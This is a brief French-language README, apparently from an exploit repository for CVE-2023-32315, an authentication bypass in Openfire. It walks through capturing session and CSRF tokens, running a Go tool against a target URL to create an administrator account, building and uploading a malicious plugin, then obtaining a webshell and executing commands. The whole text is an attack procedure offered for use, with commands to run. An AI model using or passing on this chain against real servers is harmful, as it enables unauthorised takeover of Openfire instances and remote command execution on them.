
CVE-2023-32315(java7)
0x01 Récupérer le JSESSIONID et le csrftoken retournés, construire la requête pour ajouter un utilisateur (remplacer JSESSIONID, csrftoken) img.png
cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 Compilation et installation du plugin
mvn clean package
ou Télécharger le plugin depuis les releases
0x03 Téléverser le plugin img.png
0x04 Obtenir un webshell img.png 0x05 Exécuter des commandes img.png